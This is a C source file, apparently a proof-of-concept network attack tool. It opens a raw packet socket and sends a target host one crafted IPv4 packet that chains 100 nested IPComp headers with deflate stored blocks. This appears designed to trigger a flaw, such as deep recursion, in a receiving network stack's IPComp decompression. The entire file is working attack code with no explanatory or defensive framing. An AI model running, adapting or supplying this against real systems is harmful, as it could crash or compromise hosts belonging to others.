#define _GNU_SOURCE
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <net/ethernet.h>
#include <err.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <arpa/inet.h>
#include <string.h>
#include <netinet/ip.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <endian.h>
#include <stddef.h>
#include <netinet/udp.h>

struct ipcomp_hdr {
	uint8_t next_proto;
	uint8_t reserved;
	uint16_t cpi;
} __attribute__((__packed__));
struct deflate_stored_hdr {
	uint8_t type;
	uint16_t len;
	uint16_t len_inverted;
} __attribute__((__packed__));
#define IPCOMP_DEFLATE 2
#define IPCOMP_HEADER_COUNT 100

unsigned char parse_hexdigit(char c) {
	if (c >= '0' && c <= '9') return c - '0';
	if (c >= 'a' && c <= 'f') return c - 'a' + 10;
	errx(1, "invalid hex digit: '%c'", c);
}

void parse_mac(unsigned char *out, char *p) {
	for (int i=0; 1; i++) {
		unsigned char high = parse_hexdigit(*(p++));
		unsigned char low = parse_hexdigit(*(p++));
		*(out++) = (high << 4) | low;
		if (i == 5) break;
		if (*(p++) != ':') errx(1, "expected ':'");
	}
}

unsigned short ip_checksum(void *buf, int len) {
	int count = len;
	unsigned int res = 0;
	while (count > 1) {
		res += *(unsigned short*)buf;
		buf += 2;
		count -= 2;
	}
	if (count > 0) res += *(unsigned char*)buf;
	while (res >> 16) res = (res & 0xffff) + (res >> 16);
	return ~res;
}

int main(int argc, char **argv) {
	char *if_name = argv[1];
	char *target_mac = argv[2];
	char *src_ip = argv[3];
	char *dst_ip = argv[4];

	int s = socket(AF_PACKET, SOCK_DGRAM, 0);
	if (s == -1) err(1, "packet socket");

	struct ifreq ifr;
	strcpy(ifr.ifr_name, if_name);
	if (ioctl(s, SIOCGIFINDEX, &ifr)) err(1, "lookup interface");
	int ifindex = ifr.ifr_ifindex;

	struct sockaddr_ll addr = {
		.sll_family = AF_PACKET,
		.sll_protocol = htons(ETH_P_IP),
		.sll_ifindex = ifindex,
		.sll_halen = 6
	};
	parse_mac(addr.sll_addr, target_mac);

	struct packet {
		struct iphdr iph;
		struct {
			struct ipcomp_hdr ipcomp;
			struct deflate_stored_hdr deflate;
		} __attribute__((__packed__)) repeated[IPCOMP_HEADER_COUNT];
		/* just to be clean... */
		struct udphdr udph;
	} __attribute__((__packed__)) packet = {
		.iph = {
			.ihl = 5,
			.version = 4,
			.tot_len = htons(sizeof(packet)),
			.protocol = IPPROTO_COMP,
			.check = 0, /* requires fixup */
			.saddr = 0, /* requires fixup */
			.daddr = 0 /* requires fixup */
		},
		.udph = {
			.uh_sport = htons(0x1337),
			.uh_dport = htons(0x1337),
			.uh_ulen = htons(sizeof(struct udphdr)),
			.uh_sum = 0 /* with UDP, we're allowed to omit the checksum :) */
		}
	};
	if (inet_pton(AF_INET, src_ip, &packet.iph.saddr) != 1) errx(1, "inet_pton");
	if (inet_pton(AF_INET, dst_ip, &packet.iph.daddr) != 1) errx(1, "inet_pton");
	packet.iph.check = ip_checksum(&packet.iph, sizeof(packet.iph));

	for (int i=0; i<IPCOMP_HEADER_COUNT; i++) {
		struct ipcomp_hdr *ipc_hdr = &packet.repeated[i].ipcomp;
		struct deflate_stored_hdr *dfl_hdr = &packet.repeated[i].deflate;
		ipc_hdr->next_proto = (i==IPCOMP_HEADER_COUNT-1)?IPPROTO_UDP:IPPROTO_COMP;
		ipc_hdr->reserved = 0;
		ipc_hdr->cpi = htons(IPCOMP_DEFLATE);
		dfl_hdr->type = 0x01; /* BFINAL=1, BTYPE=00(stored) */
		dfl_hdr->len = htole16(sizeof(packet)-offsetof(struct packet, repeated[i+1]));
		dfl_hdr->len_inverted = ~dfl_hdr->len;
	}


	if (sendto(s, &packet, sizeof(packet), 0, (struct sockaddr *)&addr, sizeof(addr)) != sizeof(packet))
		err(1, "sendto");
	puts("done.");
	return 0;
}
